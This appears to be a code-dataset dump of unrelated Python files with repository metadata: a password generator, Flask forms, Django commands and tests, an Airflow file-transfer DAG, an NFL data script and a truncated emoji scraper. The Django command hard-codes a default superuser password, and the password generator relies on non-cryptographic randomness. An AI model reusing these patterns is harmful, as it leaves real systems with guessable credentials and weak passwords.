ea4e378c8d9e530edadd4a3315fe9e8acc98460b
|
[
"Apache-2.0"
] | null | null | null |
GeneratePassword/generate_password_v2.py
|
OneScreenfulOfPython/screenfuls
|
ea4e378c8d9e530edadd4a3315fe9e8acc98460b
|
[
"Apache-2.0"
] | null | null | null |
import os, sys
import random
import string
try:
    # Make Python2 work like Python3
    # (Py2's raw_input returns a string without eval'ing it, like Py3's input)
    input = raw_input
except NameError:
    # On Python3; already using input
    pass
# Candidate character classes for password generation.
letters = string.ascii_letters
numbers = string.digits
punctuation = string.punctuation
def generate(password_length, at_least_one_letter, at_least_one_number, at_least_one_punctuation):
    """Build a random password of the requested length.

    Each boolean flag both enables its character class in the candidate pool
    and guarantees at least one character from that class appears in the
    result.
    """
    # The pool is the union of the enabled classes.
    pool = ""
    if at_least_one_letter:
        pool += letters
    if at_least_one_number:
        pool += numbers
    if at_least_one_punctuation:
        pool += punctuation
    chosen = ""
    for _ in range(password_length):
        # Satisfy each "at least one" guarantee first, then draw freely
        # from the whole pool.
        if at_least_one_letter:
            pick = random.choice(letters)
            at_least_one_letter = False
        elif at_least_one_number:
            pick = random.choice(numbers)
            at_least_one_number = False
        elif at_least_one_punctuation:
            pick = random.choice(punctuation)
            at_least_one_punctuation = False
        else:
            pick = random.choice(pool)
        chosen += pick
    # Shuffle so the guaranteed characters are not always at the front.
    # (random.shuffle works in place on a list.)
    shuffled = list(chosen)
    random.shuffle(shuffled)
    return "".join(shuffled)
if __name__ == '__main__':
    # Interactive driver: an empty answer defaults each class toggle to "Y".
    password_length = int(input("How many letters? "))
    at_least_one_letter = "Y" == (input("At least one letter [Y/n]? ").upper() or "Y")
    at_least_one_number = "Y" == (input("At least one number [Y/n]? ").upper() or "Y")
    at_least_one_punctuation = "Y" == (input("At least one punctuation [Y/n]? ").upper() or "Y")
    password = generate(password_length, at_least_one_letter, at_least_one_number, at_least_one_punctuation)
    print("Your password is: {}".format(password))
| 33.5
| 108
| 0.658138
| 369
| 2,814
| 4.821138
| 0.365854
| 0.086565
| 0.123665
| 0.062957
| 0.229342
| 0.106802
| 0.106802
| 0.106802
| 0.084317
| 0.084317
| 0
| 0.001428
| 0.253376
| 2,814
| 83
| 109
| 33.903614
| 0.845312
| 0.327292
| 0
| 0.046512
| 0
| 0
| 0.074878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0.255814
| 0.069767
| 0
| 0.116279
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b93b21d31a5eecb527d2b3ad7f00cf5d4683d661
| 1,535
|
py
|
Python
|
forms.py
|
lennykioko/Flask-social-network
|
15bfe1f7dca90074c0cbef62c5da9d5a25b5ce65
|
[
"MIT"
] | 1
|
2018-04-15T19:35:54.000Z
|
2018-04-15T19:35:54.000Z
|
forms.py
|
lennykioko/Flask-social-network
|
15bfe1f7dca90074c0cbef62c5da9d5a25b5ce65
|
[
"MIT"
] | null | null | null |
forms.py
|
lennykioko/Flask-social-network
|
15bfe1f7dca90074c0cbef62c5da9d5a25b5ce65
|
[
"MIT"
] | null | null | null |
# forms are not just about display, instead they are more of validation
# wtf forms protect our site against csrf attacks
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, TextAreaField
from wtforms.validators import (DataRequired, Regexp, ValidationError, Email,
Length, EqualTo)
from models import User
def name_exists(form, field):
    """WTForms validator: reject the field if the username is already taken."""
    taken = User.select().where(User.username == field.data).exists()
    if taken:
        raise ValidationError('User with this name already exists.')
def email_exists(form, field):
    """WTForms validator: reject the field if the email is already registered."""
    taken = User.select().where(User.email == field.data).exists()
    if taken:
        raise ValidationError('User with this email already exists.')
class RegisterForm(FlaskForm):
    """Sign-up form: unique username and email, plus a confirmed password."""
    username = StringField(
        'Username', # is the label
        validators=[
            DataRequired(),
            Regexp(
                r'^[a-zA-Z0-9_]+$',
                message = ("Username should be one word, letters, numbers and underscores only.")
            ),
            name_exists  # custom validator: reject duplicate usernames
        ])
    email = StringField(
        'Email',
        validators=[
            DataRequired(),
            Email(),
            email_exists  # custom validator: reject duplicate emails
        ])
    password = PasswordField(
        'Password',
        validators=[
            DataRequired(),
            Length(min=8),
            # Must match the confirmation field below.
            EqualTo('password2', message = 'Passwords must match')
        ])
    password2 = PasswordField(
        'Confirm Password',
        validators=[DataRequired()
        ])
class LoginForm(FlaskForm):
    """Login form: email + password, both required."""
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
class PostForm(FlaskForm):
    """Single-field form for creating a status post."""
    content = TextAreaField("What's Up?", validators = [DataRequired()])
| 25.583333
| 85
| 0.712704
| 171
| 1,535
| 6.362573
| 0.48538
| 0.141544
| 0.082721
| 0.03125
| 0.334559
| 0.240809
| 0.152574
| 0.152574
| 0
| 0
| 0
| 0.003891
| 0.162866
| 1,535
| 59
| 86
| 26.016949
| 0.842802
| 0.084691
| 0
| 0.222222
| 0
| 0
| 0.172734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0.155556
| 0.088889
| 0
| 0.355556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9421dbb7e263a5a3de9a9e29e270b09ceba630c
| 1,004
|
py
|
Python
|
django_events/users/management/commands/create_default_su.py
|
chrisBrookes93/django-events-management
|
93886448a7bb85c8758324977ff67bcacc80bbec
|
[
"MIT"
] | null | null | null |
django_events/users/management/commands/create_default_su.py
|
chrisBrookes93/django-events-management
|
93886448a7bb85c8758324977ff67bcacc80bbec
|
[
"MIT"
] | null | null | null |
django_events/users/management/commands/create_default_su.py
|
chrisBrookes93/django-events-management
|
93886448a7bb85c8758324977ff67bcacc80bbec
|
[
"MIT"
] | null | null | null |
from django.core.management.base import BaseCommand
from django.contrib.auth import get_user_model
class Command(BaseCommand):
    """Management command that seeds an initial superuser when none exists."""
    help = "Creates a default super user if one doesn't already exist. " \
           "This is designed to be used in the docker-compose.yml to create an initial super user on deployment."
    def handle(self, *args, **kwargs):
        """
        Checks whether any super users exist and creates a default one if not
        :param args: Unused
        :param kwargs: Unused
        """
        super_users = get_user_model().objects.filter(is_superuser=True)
        if super_users.exists():
            self.stdout.write('A superuser already exists, not creating one')
        else:
            # NOTE(review): default credentials are hard-coded in source; the
            # message below tells the operator to rotate them -- confirm this
            # is acceptable for the deployment model.
            get_user_model().objects.create_superuser(email="admin@events.com", password="EventsEvents")
            self.stdout.write('Created default superuser "admin@events.com"')
            self.stdout.write('Make sure you change the password immediately!')
| 41.833333
| 114
| 0.661355
| 129
| 1,004
| 5.069767
| 0.581395
| 0.03211
| 0.055046
| 0.058104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1,004
| 23
| 115
| 43.652174
| 0.868526
| 0.111554
| 0
| 0
| 0
| 0.076923
| 0.387214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.153846
| 0.153846
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9458ab72f55b4db845f6d76e44dba3b00e000ed
| 6,265
|
py
|
Python
|
src/features/v3/proc_v3_n1_calc_distance.py
|
askoki/nfl_dpi_prediction
|
dc3256f24ddc0b6725eace2081d1fb1a7e5ce805
|
[
"MIT"
] | null | null | null |
src/features/v3/proc_v3_n1_calc_distance.py
|
askoki/nfl_dpi_prediction
|
dc3256f24ddc0b6725eace2081d1fb1a7e5ce805
|
[
"MIT"
] | null | null | null |
src/features/v3/proc_v3_n1_calc_distance.py
|
askoki/nfl_dpi_prediction
|
dc3256f24ddc0b6725eace2081d1fb1a7e5ce805
|
[
"MIT"
] | null | null | null |
import os
import sys
import pandas as pd
from datetime import datetime
from settings import RAW_DATA_DIR, DataV3, DATA_V3_SUBVERSION
from src.features.helpers.processing import add_missing_timestamp_values
from src.features.helpers.processing_v3 import get_closest_players, get_players_and_ball_indices, calculate_distance, \
normalize_according_to_play_direction, check_group_event
from src.features.helpers.processing_v4 import home_has_possession, calculate_team_sitation
# Week number to process comes from the first CLI argument.
week_num = int(sys.argv[1])
data_v3 = DataV3(DATA_V3_SUBVERSION)
save_file_path = data_v3.get_step1_checkpoint_path(week_num)
# Resume from the step-1 checkpoint if a previous run already produced it.
try:
    clean_df = pd.read_csv(save_file_path)
    save_file_exists = True
except FileNotFoundError:
    save_file_exists = False
if not save_file_exists:
    # No checkpoint yet: build clean_df from the raw weekly CSVs.
    print("Started loading data")
    play_df = pd.read_csv(os.path.join(RAW_DATA_DIR, 'plays.csv'))
    games_df = pd.read_csv(os.path.join(RAW_DATA_DIR, 'games.csv'))
    week_and_games = games_df[games_df.week == week_num]
    tracking_df = pd.read_csv(os.path.join(RAW_DATA_DIR, f'week{week_num}.csv'))
    print("Data loaded. Start processing timestamps")
    tracking_df = add_missing_timestamp_values(tracking_df)
    games_n_plays_df = play_df.merge(week_and_games, how='inner', on='gameId')
    m_grouped = games_n_plays_df.groupby(['gameId', 'playId'])  # NOTE(review): unused
    df_t = tracking_df.merge(games_n_plays_df, how='left', on=['gameId', 'playId'])
    # Remove all events without 'pass_forward'
    df_t_grouped = df_t.groupby(['gameId', 'playId'])
    df_t_v3 = df_t.copy().sort_index()
    for name, group in df_t_grouped:
        game_id, play_id = name
        # if group does not contain pass forward, drop it
        if all(group.event != 'pass_forward'):
            df_t_v3 = df_t_v3[(df_t_v3.gameId != game_id) | (df_t_v3.playId != play_id)]
    df_t_v3_s = df_t_v3.sort_values(by=['gameId', 'playId', 'time', 'event'])
    df_t_v3_s = df_t_v3_s.reset_index(drop=True)
    df_t_grouped = df_t_v3_s.groupby(['gameId', 'playId'])
    # remove all values before 'pass_forward'
    print("Removing all values before pass forward event...")
    for name, group in df_t_grouped:
        game_id, play_id = name
        # Index of the row just before the first 'pass_forward' in this play.
        pass_forward_frame_id = group[group.event == 'pass_forward'].index.min() - 1
        remove_start = group.index.min()
        df_t_v3_s = df_t_v3_s.drop(df_t_v3_s.loc[remove_start:pass_forward_frame_id].index)
    pd.options.mode.chained_assignment = None
    gb = df_t_v3_s.groupby(['gameId', 'playId'])
    print('Getting closest players...')
    keep_indices = []
    for name, group in gb:
        game_id, play_id = name
        try:
            # Third distinct event of the play -- presumably the situation of
            # interest after the pass; TODO confirm against the data spec.
            event_3rd = group.event.unique()[2]
        except IndexError:
            print('Number of events is < 3, skipping...')
            continue
        situation_df = group[group.event == event_3rd]
        # convert dataframe into series
        ball_row = situation_df[situation_df.team == 'football'].head(1)
        # remove ball
        player_situation_df = situation_df[situation_df.team != 'football']
        try:
            p1, p2 = get_closest_players(player_situation_df, ball_row.x.item(), ball_row.y.item())
        except ValueError:
            print('Value Error raised. This group will be skipped.')
            continue
        p_n_b_indices = get_players_and_ball_indices(group, p1, p2)
        if p_n_b_indices:
            keep_indices.extend(p_n_b_indices)
    # Keep only the two closest players plus the ball, then checkpoint to CSV.
    clean_df = df_t_v3_s[df_t_v3_s.index.isin(keep_indices)]
    clean_df.to_csv(
        save_file_path,
        index=False
    )
print('Normalize...')
# Mirror coordinates so every play reads in the same direction.
clean_df = normalize_according_to_play_direction(clean_df)
clean_df['homeHasPossession'] = clean_df.apply(
    lambda row: home_has_possession(row), axis=1
)
# Label each row's role: 'attacking' / 'defending' / 'football'.
clean_df['teamSituation'] = clean_df.apply(
    lambda row: calculate_team_sitation(row), axis=1
)
print('Creating features...')
min_df = clean_df[[  # NOTE(review): min_df is never used afterwards
    'time', 'x', 'y', 's', 'o', 'dir', 'event', 'team',
    'gameId', 'playId', 'frameId', 'isDefensivePI'
]]
gb_2 = clean_df.groupby(['gameId', 'playId', 'frameId'])
# ball direction and orientation are NaN
calc_df = pd.DataFrame(
    columns=[
        'time',
        'att_def_d', 'att_ball_d', 'def_ball_d',
        'att_s', 'def_s', 'ball_s',
        'att_o', 'def_o',
        'att_dir', 'def_dir',
        'event', 'gameId', 'playId', 'frameId', 'isDefensivePI'
    ]
)
GROUP_SIZE_MINIMUM = 3  # a usable frame needs attacker, defender and the ball
for name, group in gb_2:
    game_id, play_id, frameId = name
    if len(group) < GROUP_SIZE_MINIMUM:
        continue
    # One row per role; squeeze() turns each single-row frame into a Series.
    ball = group[group.teamSituation == 'football'].head(1).squeeze()
    p_att = group[group.teamSituation == 'attacking'].head(1).squeeze()
    p_def = group[group.teamSituation == 'defending'].head(1).squeeze()
    group_row = group.head(1).squeeze()
    group_events = group.event.unique().tolist()
    # NOTE(review): keys such as 'att_a'/'pass_arrived'/'week' are not in
    # calc_df's declared columns; pandas silently adds them on append.
    dict_to_append = {
        'time': group_row.time,
        'att_def_d': calculate_distance(p_att.x, p_att.y, p_def.x, p_def.y),
        'att_ball_d': calculate_distance(p_att.x, p_att.y, ball.x, ball.y),
        'def_ball_d': calculate_distance(p_def.x, p_def.y, ball.x, ball.y),
        'att_s': p_att.s, 'def_s': p_def.s, 'ball_s': ball.s,
        'att_a': p_att.a, 'def_a': p_def.a, 'ball_a': ball.a,
        'att_o': p_att.o, 'def_o': p_def.o,
        'att_dir': p_att.dir, 'def_dir': p_def.dir,
        'event': group_row.event,
        'pass_arrived': check_group_event(group_events, 'pass_arrived'),
        'pass_outcome_caught': check_group_event(group_events, 'pass_outcome_caught'),
        'tackle': check_group_event(group_events, 'tackle'),
        'first_contact': check_group_event(group_events, 'first_contact'),
        'pass_outcome_incomplete': check_group_event(group_events, 'pass_outcome_incomplete'),
        'out_of_bounds': check_group_event(group_events, 'out_of_bounds'),
        'week': week_num,
        'gameId': group_row.gameId,
        'playId': group_row.playId,
        'frameId': group_row.frameId,
        'isDefensivePI': group_row.isDefensivePI
    }
    # NOTE(review): DataFrame.append is deprecated (removed in pandas 2.0)
    # and re-copies the frame each iteration; collecting dicts and calling
    # pd.concat once at the end would be both future-proof and O(n).
    calc_df = calc_df.append(
        dict_to_append,
        ignore_index=True
    )
print("Saving data...")
# Persist the per-frame feature table for the downstream modeling step.
calc_df.to_csv(
    data_v3.get_step1_end_path(week_num),
    index=False
)
print(f'End time: {datetime.now().strftime("%H:%M:%S")}')
| 35.596591
| 119
| 0.675499
| 934
| 6,265
| 4.17666
| 0.217345
| 0.017688
| 0.020508
| 0.015381
| 0.277108
| 0.136632
| 0.102538
| 0.067931
| 0.058703
| 0.044348
| 0
| 0.009312
| 0.194413
| 6,265
| 175
| 120
| 35.8
| 0.763622
| 0.03336
| 0
| 0.095588
| 0
| 0
| 0.168788
| 0.013721
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.051471
| 0.058824
| 0
| 0.058824
| 0.073529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b967ba0197b144171458b230c2dfe31844ba0b72
| 5,231
|
py
|
Python
|
dags/download_decrypt_transfer_files.py
|
hms-dbmi/bch-pic-sure-airflow-dags
|
0c1e6f07da4e270581942e551ac30284474921d4
|
[
"Apache-2.0"
] | null | null | null |
dags/download_decrypt_transfer_files.py
|
hms-dbmi/bch-pic-sure-airflow-dags
|
0c1e6f07da4e270581942e551ac30284474921d4
|
[
"Apache-2.0"
] | null | null | null |
dags/download_decrypt_transfer_files.py
|
hms-dbmi/bch-pic-sure-airflow-dags
|
0c1e6f07da4e270581942e551ac30284474921d4
|
[
"Apache-2.0"
] | null | null | null |
"""
@author: anilkdegala
"""
import os
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator, BranchPythonOperator
from datetime import date, timedelta, datetime
from collections import OrderedDict
from scripts.dag_pebbles import DagPebbles
from airflow.configuration import conf
from scripts.configurations import *
from airflow.operators.dummy_operator import DummyOperator
# Defaults applied to every task in the DAG defined below.
default_args = {
    "owner": "anilkdegala",
    "depends_on_past": True,
    "max_active_runs": 1,
    "start_date": datetime(2015, 6, 1),
    "is_active": True,
    "is_paused_upon_creation": False,
}
def begin_pipeline(**kwargs):
    """Build argument strings from the trigger payload and push them via XCom.

    Expects dag_run.conf['files'] to be a list of dicts with 'name', 'path'
    and 'final_name' keys -- TODO confirm against the triggering caller.
    """
    print("begin_pipeline:")
    files = kwargs['dag_run'].conf.get('files')
    download_decrypt_arguments = ''
    transfer_arguments_list = []
    for f in files:
        print("download_decrypt_transfer_files: file: ", f['name'], ', location: ', f['path'])
        # Each file contributes one space-separated "name,path,final_name" triple.
        output = f['name']+','+f['path']+','+f['final_name']
        download_decrypt_arguments = download_decrypt_arguments + " " + output
        transfer_arguments_list.append(DATA_LOCATION + "/"+f['final_name'])
    transfer_arguments = ",".join(transfer_arguments_list)
    print("final download_decrypt_arguments: ",download_decrypt_arguments)
    print("final transfer_arguments: ",transfer_arguments)
    # Downstream Bash tasks consume these via ti.xcom_pull(key=...).
    kwargs["ti"].xcom_push(key="download_decrypt_arguments", value=download_decrypt_arguments)
    kwargs["ti"].xcom_push(key="transfer_arguments", value=transfer_arguments)
def pipeline_enable_check(**kwargs):
    """Branch callable: pick the next task id based on the DATA_LOAD switch."""
    dp = DagPebbles()
    if dp.pipeline_enable_check('DATA_LOAD'):
        return "pipeline_check_passed"
    return "pipeline_check_skipped"
def pipeline_check_passed(**kwargs):
    # Marker task: the branch decided the pipeline should continue.
    print("pipeline_check_passed:")
def end_pipeline(**kwargs):
    # Marker task: normal end of the pipeline.
    print("end_pipeline:")
def pipeline_check_skipped(**kwargs):
    # Marker task: the branch decided the pipeline is disabled.
    print("pipeline_check_skipped:")
def cleanup(**kwargs):
    # Placeholder cleanup step; currently only logs.
    dp = DagPebbles()
    print("cleanup")
def notify(**kwargs):
    # Placeholder notification step; currently only logs.
    dp = DagPebbles()
    print("notify")
def end(**kwargs):
dp = DagPebbles()
print("end")
with DAG(
    "DOWNLOAD_DECRYPT_TRANSFER",
    description="Download, Decrypt, Transfer files (Source: S3, Staging: EC2: Target: RDS Oracle)",
    default_args=default_args,
    schedule_interval=None,  # triggered manually with a conf payload
    catchup=False,
    orientation="TB",
    tags=['Utils'],
    dagrun_timeout=timedelta(hours=240),
) as dag:
    # --- control tasks: begin, then branch on the enable check --------------
    t_pipeline_begin = PythonOperator(
        task_id="begin_pipeline",
        python_callable=begin_pipeline,
        provide_context=True,
        dag=dag,
    )

    t_check_pipeline = BranchPythonOperator(
        task_id="check_pipeline",
        python_callable=pipeline_enable_check,
        provide_context=True,
        dag=dag,
    )

    t_pipeline_check_passed = PythonOperator(
        task_id="pipeline_check_passed",
        python_callable=pipeline_check_passed,
        provide_context=True,
        dag=dag,
    )

    t_pipeline_check_skipped = PythonOperator(
        task_id="pipeline_check_skipped",
        python_callable=pipeline_check_skipped,
        provide_context=True,
        dag=dag,
    )

    # --- worker tasks: shell commands pull their arguments from the XCom
    # values published by begin_pipeline (Jinja-templated at render time) ----
    download_files_cmd = "/opt/bitnami/airflow/airflow-data/scripts/download_files.sh " + "{{ ti.xcom_pull(key='download_decrypt_arguments')}}"
    t_download_files = BashOperator(
        task_id='download_files',
        bash_command=download_files_cmd,
        dag=dag,
    )

    decrypt_files_cmd = "/opt/bitnami/airflow/airflow-data/scripts/decrypt_files.sh " + "{{ ti.xcom_pull(key='download_decrypt_arguments')}} "
    t_decrypt_files = BashOperator(
        task_id='decrypt_files',
        bash_command=decrypt_files_cmd,
        dag=dag,
    )

    transfer_files_cmd = "/opt/bitnami/airflow/airflow-data/scripts/transfer_files_rds.pl " + "{{ ti.xcom_pull(key='transfer_arguments')}} "
    t_transfer_files = BashOperator(
        task_id='transfer_files',
        bash_command=transfer_files_cmd,
        dag=dag,
    )

    # --- wrap-up tasks run after either branch ("none_failed") --------------
    t_end_pipeline = PythonOperator(
        task_id="end_pipeline",
        python_callable=end_pipeline,
        provide_context=True,
        trigger_rule="none_failed",
        dag=dag,
    )

    t_notify = PythonOperator(
        task_id="send_notifications",
        python_callable=notify,
        provide_context=True,
        trigger_rule="none_failed",
        dag=dag,
    )

    t_cleanup = PythonOperator(
        task_id="cleanup",
        python_callable=cleanup,
        provide_context=True,
        trigger_rule="none_failed",
        dag=dag,
    )

    t_end = PythonOperator(
        task_id="end",
        python_callable=end,
        provide_context=True,
        trigger_rule="none_failed",
        dag=dag,
    )

    # Graph:
    # begin -> check -> (skipped | download -> decrypt -> transfer)
    #       -> end_pipeline -> cleanup -> notify -> end
    t_pipeline_begin >> t_check_pipeline
    t_check_pipeline >> t_pipeline_check_skipped >> t_end_pipeline
    t_check_pipeline >> t_pipeline_check_passed >> t_download_files >> t_decrypt_files >> t_transfer_files >> t_end_pipeline
    t_end_pipeline >> t_cleanup >> t_notify >> t_end
| 30.770588
| 171
| 0.664118
| 585
| 5,231
| 5.586325
| 0.218803
| 0.055692
| 0.066095
| 0.025704
| 0.250306
| 0.222766
| 0.168605
| 0.146573
| 0.083843
| 0.083843
| 0
| 0.002979
| 0.229975
| 5,231
| 169
| 172
| 30.952663
| 0.808342
| 0.003823
| 0
| 0.201493
| 0
| 0
| 0.208149
| 0.111474
| 0.022388
| 0
| 0
| 0
| 0
| 1
| 0.059701
| false
| 0.052239
| 0.074627
| 0
| 0.149254
| 0.074627
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b96b280416f0d557826ffa670a7914f2d45e5fc5
| 526
|
py
|
Python
|
src/sot_talos_balance/test/test_feet_admittance.py
|
imaroger/sot-talos-balance
|
5e56700b4e105273ecf6feb3474789beac469a77
|
[
"BSD-2-Clause"
] | null | null | null |
src/sot_talos_balance/test/test_feet_admittance.py
|
imaroger/sot-talos-balance
|
5e56700b4e105273ecf6feb3474789beac469a77
|
[
"BSD-2-Clause"
] | null | null | null |
src/sot_talos_balance/test/test_feet_admittance.py
|
imaroger/sot-talos-balance
|
5e56700b4e105273ecf6feb3474789beac469a77
|
[
"BSD-2-Clause"
] | null | null | null |
'''Test feet admittance control'''
from sot_talos_balance.utils.run_test_utils import run_ft_calibration, run_test, runCommandClient

try:
    # Python 2 compatibility: alias raw_input so the input() calls below
    # behave the same on both major versions.
    input = raw_input  # noqa
except NameError:
    pass

run_test('appli_feet_admittance.py')

run_ft_calibration('robot.ftc')
input("Wait before running the test")

print('Set saturation value')
runCommandClient('robot.admBF_dqSaturation.sin.value = [0.0, 0.0, 0.01, 0.0, 0.0, 0.0]')

input("Wait before dumping the data")
runCommandClient('dump_tracer(robot.tracer)')
| 25.047619
| 97
| 0.752852
| 79
| 526
| 4.822785
| 0.556962
| 0.047244
| 0.055118
| 0.052493
| 0.028871
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030369
| 0.123574
| 526
| 20
| 98
| 26.3
| 0.796095
| 0.081749
| 0
| 0
| 0
| 0.083333
| 0.42437
| 0.17437
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.083333
| 0.083333
| 0
| 0.083333
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b96d766a7c5eab27eb3785b1277b6beccda7c9ed
| 1,446
|
py
|
Python
|
auth/tests/test_views.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
auth/tests/test_views.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
auth/tests/test_views.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.test import Client
class RegisterTestCase(TestCase):
    """Exercise /accounts/register/ with valid and invalid form input."""

    def test_register(self):
        c = Client()

        # on success redirects to /
        response = c.post('/accounts/register/', {
            'username': 'asdas',
            'password1': 'asdasdasd12',
            'password2': 'asdasdasd12'
        })
        self.assertRedirects(response, '/')

        # passwords don't match: form redisplayed with errors (HTTP 200)
        response = c.post('/accounts/register/', {
            'username': 'asdasdasd1',
            'password1': 'asdasdasd1',
            'password2': 'asdasdasd2'
        })
        # assertEquals is a deprecated alias; assertEqual is the supported name.
        self.assertEqual(response.status_code, 200)

        # username is empty
        response = c.post('/accounts/register/', {
            'username': '',
            'password1': 'asdasdasd12',
            'password2': 'asdasdasd12'
        })
        self.assertEqual(response.status_code, 200)

        # no password
        response = c.post('/accounts/register/', {
            'username': 'asdasdasd',
            'password1': '',
            'password2': ''
        })
        self.assertEqual(response.status_code, 200)

        # username and password are similar
        response = c.post('/accounts/register/', {
            'username': 'asdasdasd0',
            'password1': 'asdasdasd1',
            'password2': 'asdasdasd1'
        })
        self.assertEqual(response.status_code, 200)
| 30.125
| 52
| 0.53527
| 116
| 1,446
| 6.62931
| 0.37931
| 0.058518
| 0.084525
| 0.136541
| 0.563069
| 0.453836
| 0.117035
| 0
| 0
| 0
| 0
| 0.037344
| 0.333333
| 1,446
| 47
| 53
| 30.765957
| 0.760373
| 0.076763
| 0
| 0.571429
| 0
| 0
| 0.258841
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.028571
| false
| 0.285714
| 0.057143
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b999aec7c34874ef90e0f30812ac97217ce90cca
| 3,145
|
py
|
Python
|
emoji.py
|
notagoat/Deepmoji
|
1ab922306c3647f9c7ea98caa2660a53b18fe4b6
|
[
"MIT"
] | 1
|
2020-03-19T20:09:00.000Z
|
2020-03-19T20:09:00.000Z
|
emoji.py
|
notagoat/Deepmoji
|
1ab922306c3647f9c7ea98caa2660a53b18fe4b6
|
[
"MIT"
] | null | null | null |
emoji.py
|
notagoat/Deepmoji
|
1ab922306c3647f9c7ea98caa2660a53b18fe4b6
|
[
"MIT"
] | null | null | null |
import requests
import urllib.request
import os.path
import shutil
import csv
def main():
    """Read instance names from data.csv and mirror each one's custom emoji.

    Per-instance failures are printed and skipped so a single bad instance
    (pleroma quirks, weirdly encoded urls, etc.) does not stop the run.
    """
    with open("data.csv") as i:  # one instance hostname per line
        instances = i.readlines()
    instances = [x.strip() for x in instances]  # drop trailing newlines/whitespace
    instances.sort()
    setup(instances)  # create all the necessary files and subfolders
    count = len(instances)  # total, just for progress output
    i = 0
    try:
        for name in instances:
            try:
                i += 1
                print("-----!" + name + "!-----")
                print(str(i) + " of " + str(count) + " remaining!")
                fetch(name)  # run the fetching code
            except Exception as e:
                print(e)  # keep going despite per-instance errors
    except Exception as e:
        print("Instance Error")
        print(e)
    clone(instances)  # copy everything into one big folder for ease of access
def fetch(name):
    """Download every custom emoji of one instance into emoji/<name>/.

    Skips files that already exist and (most) Mutant Standard emoji, whose
    shortcodes contain "ms_" — that set is huge and common.
    """
    # Standard Mastodon-compatible endpoint for an instance's custom emoji.
    r = requests.get('https://%s/api/v1/custom_emojis' % name, allow_redirects=True)
    path = "emoji/%s/" % name  # setup() guarantees this folder exists
    try:
        for emoji in r.json():  # each entry describes one emoji
            try:
                if os.path.isfile(path + emoji['shortcode'] + ".png"):
                    continue  # already downloaded
                if "ms_" not in emoji['shortcode']:
                    emojiimage = requests.get(emoji['static_url'], allow_redirects=True)
                    # BUG FIX: the original left the file handle open; use a
                    # context manager so it is always closed.
                    with open(path + emoji['shortcode'] + ".png", 'wb') as out:
                        out.write(emojiimage.content)
            except Exception as e:
                # If something's fucky, report it and keep going.
                print("Did not get: " + emoji['url'])
                print(e)
    except Exception as e:
        print(e)
def setup(instances):
if (os.path.isdir("emoji/")): #Check to see if emoji/ exists
pass
else:
os.mkdir("emoji/") #make it if it doesnt
for name in instances:
if (os.path.isdir("emoji/%s/"%name)):
pass
else: os.mkdir("emoji/%s/"%name)
if (os.path.isdir("emoji/all")):
pass
else:
os.mkdir("emoji/all")
def clone(instances):
    """Copy every downloaded emoji into the shared emoji/all folder.

    Name collisions across instances silently overwrite; copy errors are
    printed and skipped.
    """
    for name in instances:
        print("Copying emoji for: %s" % name)
        path = "emoji/%s/" % name
        # BUG FIX (readability): the original reused the loop variable `name`
        # for the file names, shadowing the instance name inside the loop.
        for fname in os.listdir(path):
            try:
